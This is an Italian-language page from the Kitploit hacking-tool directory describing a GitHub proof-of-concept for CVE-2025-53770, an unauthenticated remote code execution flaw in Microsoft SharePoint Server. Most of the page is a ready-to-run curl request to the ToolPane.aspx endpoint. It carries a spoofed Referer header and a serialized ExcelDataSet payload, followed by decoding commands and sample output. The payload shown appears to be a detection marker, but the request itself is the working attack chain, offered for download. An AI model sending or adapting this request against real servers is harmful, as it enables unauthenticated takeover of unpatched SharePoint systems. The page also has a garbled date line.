Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cve-2025-53770 — Exploit proof-of-concept per l'esecuzione remota di codice non autenticata tramite deserializzazione non sicura in Microsoft SharePoint Server (CVE-2025-53770), con estrazione del payload e comandi di decodifica. | Kitploit
Strumenti/GitHubGitHub/0xray5c68616e37/cve-2025-53770
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingSviluppo Payload
GitHub0xray5c68616e37/cve-2025-53770

cve-2025-53770

Exploit proof-of-concept per l'esecuzione remota di codice non autenticata tramite deserializzazione non sicura in Microsoft SharePoint Server (CVE-2025-53770), con estrazione del payload e comandi di decodifica.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi RepositorySito web
31 anno faNon ancora revisionato

CVE-2025-53770 PoC di Deserializzazione RCE di SharePoint

Critico — Esecuzione remota di codice non autenticata tramite deserializzazione non sicura in Microsoft SharePoint Server (CVE-2025-53770)

Descrizione

La deserializzazione di dati non attendibili in Microsoft SharePoint Server on-premises consente a un attaccante di eseguire codice in remoto e compromettere il sistema. Microsoft è a conoscenza dello sfruttamento attivo e sta preparando un aggiornamento completo. Assicurarsi che le mitigazioni dalla documentazione CVE siano attive.

  • Impatto: Gli attaccanti non autenticati possono ottenere l'esecuzione remota di codice, portando alla compromissione totale del sistema.
  • Gravità: Critico

Prova di Concetto

La seguente PoC dimostra come un attaccante possa sfruttare la vulnerabilità per estrarre e decodificare payload malevoli tramite l'endpoint vulnerabile.

Il dominio target è stato intenzionalmente sostituito con reeaccated.com.

Comando

root@kitploit:~
curl -sk -X POST 'https://reeaccated.com/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx' \
  -H 'Referer: /_layouts/SignOut.aspx' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data-urlencode 'MSOTlPn_Uri=https://reeaccated.com' \
  --data-urlencode 'MSOTlPn_DWP=
<%@ Register Tagprefix="Scorecard" Namespace="Microsoft.PerformancePoint.Scorecards" Assembly="Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>
<%@ Register Tagprefix="asp" Namespace="System.Web.UI" Assembly="System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" %>
<asp:UpdateProgress ID="UpdateProgress1" DisplayAfter="10" runat="server" AssociatedUpdatePanelID="upTest">
  <ProgressTemplate>
    <div class="divWaiting">
      <Scorecard:ExcelDataSet CompressedDataTable="H4sIAADEfmgA/4WRX2uzMBTG7/0Ukvs06ihjQb3ZbgobG1TYeO9OY6yBJpGTdHbfvudVu44x6FUkPn9+PEnK1nTdHuV8gE1P9uCCtKGFCBU7opNB9dpC4NYo9MF3kStvJen4rGKLZ4645bkU8c+c1Umalp33/0/62gGmC45pK9bA7qBZOpdI9OMrtpryM3ZR9RAee3B7HSpmXNAYdTuFTnGDVwvZKZiK9TEOUohxHFfj3crjXhRZlouPl+ftBMspIYJTVHlxEcQt13cdFTY6xHeEYdB4vaX7jet8vXERj8S/VeCcxicdtYrGuzf4OnhoSzGpftoaYykQ7FAXWbHm2T0v8qYoZP4g1+t/pbj+vyKIPxhKQUssEwvaeFpdTLOX4tfz18kZONVdDRICAAA=" DataTable-CaseSensitive="false" runat="server"></Scorecard:ExcelDataSet>
    </div>
  </ProgressTemplate>
</asp:UpdateProgress>' \
| grep -oP 'CompressedDataTable=&quot;\K[^&]+(?=&quot;)' \
| base64 -d 2>/dev/null \
| gzip -d 2>/dev/null \
| tee /tmp/sharepoint_decoded_payload.txt \
| grep -Ei 'IntruderScannerDetectionPayload|ExcelDataSet|divWaiting|ProgressTemplate|Scorecard'

Output

root@kitploit:~
<Info>IntruderScannerDetectionPayload</Info>
image

Riferimenti

  • Implementazione del Payload di Test
  • Analisi di Sicurezza di Code White
  • Guida Microsoft
  • Voce NVD

Impatto:
Gli attaccanti non autenticati possono sfruttare la deserializzazione non sicura per ottenere l'esecuzione remota di codice su SharePoint Server, portando alla compromissione totale del sistema.

Scarica lo strumento